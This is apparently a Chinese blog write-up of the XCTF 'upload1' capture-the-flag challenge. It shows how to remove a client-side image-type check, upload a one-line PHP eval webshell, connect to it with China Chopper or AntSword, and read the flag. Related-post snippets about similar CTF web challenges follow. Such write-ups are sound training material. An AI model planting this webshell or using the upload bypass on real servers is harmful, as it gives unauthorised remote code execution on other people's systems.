【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑

最新推荐文章于 2024-10-26 20:06:58 发布
原创 最新推荐文章于 2024-10-26 20:06:58 发布 · 611 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #js #web #安全 #安全漏洞

本文探讨了如何绕过前端对图片上传的限制,通过修改前端代码实现任意文件类型的上传,并展示了一个上传PHP代码文件的例子。 


<!Doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<script type="text/javascript">
 

Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}


}

</script>

</head>
<body>



<form enctype='multipart/form-data' id='aa' name='aaa' method='post' action='index.php'> 
<input  id="upfile" name='upfile' type='file' onchange="check();" /> 

<input type='submit'  id ='submit' value='上传'> 
</form> 



</body>

前端上传限制只能是图片

F12
在这里插入图片描述把前端里面的限制函数删掉!

变成这样子——
在这里插入图片描述
上传一句话 我爱你 :Trojan

<?php @eval($_POST['x']) ?>


在这个页面
http://124.126.19.106:55113/index.php
上传成功

找到上传文件的位置,题目显示了/upload/1588499500.cknife.php

所以文件就在
http://124.126.19.106:55113/upload/1588499500.cknife.php

菜刀可,蚁剑也可

你若菜刀cknife
在这里插入图片描述

在这里插入图片描述在这里插入图片描述

法宝一:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述不二法宝:
在这里插入图片描述附上小旗帜🚩
flag=“cyberpeace{5327a18ceab8d7b4b1db828776bbe303}”

xctf攻防世界 Web高手进阶upload1
l8947943的博客
08-03 9611
xctf攻防世界 Web高手进阶upload1
xctf攻防世界 Web高手进阶区 unfinish
l8947943的博客
01-02 4410
1. 进入环境,查看页面 我的心情和这个图像一样懵逼,拿起dirsearch就是一顿乱扫。如图: 发现有register.php 2. 问题分析 登入register.php,注册相关账户并登录 直接吧usrname给显示出来了,也就是说,注册提交了usrname数据,然后又从数据库中查询了username并回显,那么问题就清晰了一丢丢,想办法通过username注入数据,在回显时候再执行。查了查相关的wp,这种方式叫做二次注入: 二次注入的原理,在第一次进行数据库插入数据的时候(注册时),仅
XCTF-高手进阶区:upload1
1stPeak's Blog
02-29 889
1、访问题目 2、测试 说明存在前端过滤,只能上传图片文件 3、解决方法:先将含有一句话木马的1.php后缀修改为x.jpg来绕过前端认证,同时使用bp抓包,再修改后缀为php,从而可以使用连接 当然,这里可以使用URL利用 注:这里直接访问不会显示,因为是php代码,没有输出,所以需要查看网页源代码 ...
攻防世界XCTFupload1
末初 · mochu7
03-08 967
前端验证,直接删除掉这段代码,或者浏览器关闭JS,然后上传webshell即可 啥函数都没有禁用,直接找flag cat了flag.php但是没有回显,可能是一个变量,查看一下源码 ...
XCTF攻防世界web进阶练习_ 4_upload
silence1_的博客
05-01 2534
XCTF攻防世界web进阶练习—upload 题目 题目为updoad,是上传的意思,应该是文件上传相关题目 打开题目,不出意料,要求上传文件。 这里先试着随便上传一个php文件,试试水 弹出一个弹窗,提示要求上传一个图片 注意:这里是弹窗提示,所以考虑是js过滤。 所以传入一个内容为php,后缀为jpg文件上传,用burp抓包 将filename改为pino.php,内容为echo phpi...
安装使用及web例题upload1实战
qq_42391153的博客
09-30 2656
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、放个链接二、安装1.下载好,解压到一个目录下2.使用方法kali安装的问题例题 前言 最近换了新电脑需要重新装一下antsword,特地想装在kali上,因为更新了新版的kali2021,碰到一些新情况,装回Windows了。整理一下的安装和使用。 一、放个链接 百度网盘保存有的安装包 链接:https://pan.baidu.com/s/18a95zpXI9OwOMnBqYGcstA 提取码:
xctf(misc)--功夫再高也怕菜刀
i_am_not_hacker的博客
08-08 3050
拿到附件后直接拖进winhex 发现有kali linux字样,就把该文件拖到kali里面,使用binwalk提取文件,发现里面有一个压缩包,其中有flag.txt 使用foremost分离文件 得到了一个output文件夹,内含zip,zip里面含有flag.txt,但是有密码加密 打开wireshark分析数据包,分组字节流搜索flag.txt,发现6666.jpg 分组字节流搜索6666...
xctf攻防世界 Web高手进阶区 blgdel
l8947943的博客
01-09 753
1.进入环境,查看内容 乱点一通,注册个账号,没有什么发现,秒杀页面有些奇怪,但也没有重要的提示,使用dirsearch扫一扫,看看有啥,如图: 我们发现有robots.txt,那就从这里入手吧! 2. 问题分析 查看robots.txt 打开后,提示config.txt是入手点,那就访问一下,打开后是一堆代码,如下: <?php class master { private $path; private $name; function __construct() { }
攻防世界-web高手进阶篇-warmup
热门推荐
qq_42016346的博客
02-06 1万+
打开题目链接后只有一个滑稽??(那就看看它里面有啥吧) 想啥呢,是审查源码啦 可以看到有注释source.php,访问后可以看到其源码 又发现一个hint.php文件,先访问再说 提示我们flag在ffffllllaaaagggg里面,此时题目已经完成一半啦 接着看回source.php源码 可以看到最后的include 是可以动态构造参数的,那应该就是解题关键了 不...
xctf攻防世界 Web高手进阶webshell
l8947943的博客
08-01 8955
webshell就是以asp、phpjsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。...
攻防世界--love_math
qq_46263951的博客
01-05 710
先来审计源码 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '
攻防世界-love_math
m0_49025459的博客
02-15 577
菜鸡的我只能看出这些,无奈之下我去看了官方的wp和大佬写的wp,他们都不约而同的使用了一个关键函数base_convert函数。然后大佬们就得出结果了,就是一股脑的把所有数据都输出。那我们就分析一下这个源码。访问题目场景,是一串源码。对一些字符做了黑名单限制。对数学函数做了白名单限制。
攻防世界 web高手进阶区 8分题 love_math
闵行小鱼塘
10-03 1425
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是love_math的writeup
[攻防世界]-WEB高手进阶区-love_math
爱国小白帽
10-03 2053
题目 就这么点人答,可能是因为太简单了大佬都不稀做吧 这个奇怪的题打开以后是这样的 它可以做减乘除,唯独不能做加法 解题过程 我的解题方法简单粗暴,直接访问flag.php文件完活 当然这可能是他们的一个bug,真正的大佬谁会这样解呢,这题主要考的是如何构造payload执行命令 [官方步骤] 可以看到题目限制了参数的长度要小于80,且不能包含空格、制表符、换行、单双引号、反引号、[]。并且输入的字符串需要为$whitelist中的函数。 最终会执行 eval('echo '.$content.'
使用 文件上传漏洞挖掘
qq_65420677的博客
03-03 416
文件上传漏洞挖掘
AntSword的使用
H29908的博客
10-26 988
是一款跨平台的网站管理工具,它与菜刀类似面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国(antSword)下载、安装、使用教程-优快云博客。
攻防世界web新手题答案_攻防世界-web-love_math(base_convert进制转换绕过白名单和长度限制) - zhengna...
weixin_39702649的博客
11-14 188
攻防世界web高手进阶upload1
hxhxhxhxx的博客
07-05 706
攻防世界web高手进阶upload1题目教程 题目 !Doctype html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script type="text/javascript"> Array.prototype.contains = function (obj) { var i = this.len
中国 配置使用
Z_l123的博客
01-13 6261
1.编写一句话木马,并命名为muma.php 2.利用靶机的文件上传漏洞,将此木马文件( Webshell )上传至靶机 1)打开dvwa网站 2)成功登录DVWA网站后,在网站主页左侧菜单选择 DVWA Security,将网站的安全级别设置为"Low": 3)在 DVWA网站主页左侧菜单选择"File upload"进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径: 3.利用"中国"连接靶机上的 muma.php 1)打开中国 2)在
攻防世界xctf web unserialize3
最新发布
01-04
### XCTF Web Unserialize Challenge Solution In the context of the XCTF competition, understanding how to exploit PHP's `unserialize()` vulnerabilities is crucial. The provided code snippets and ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值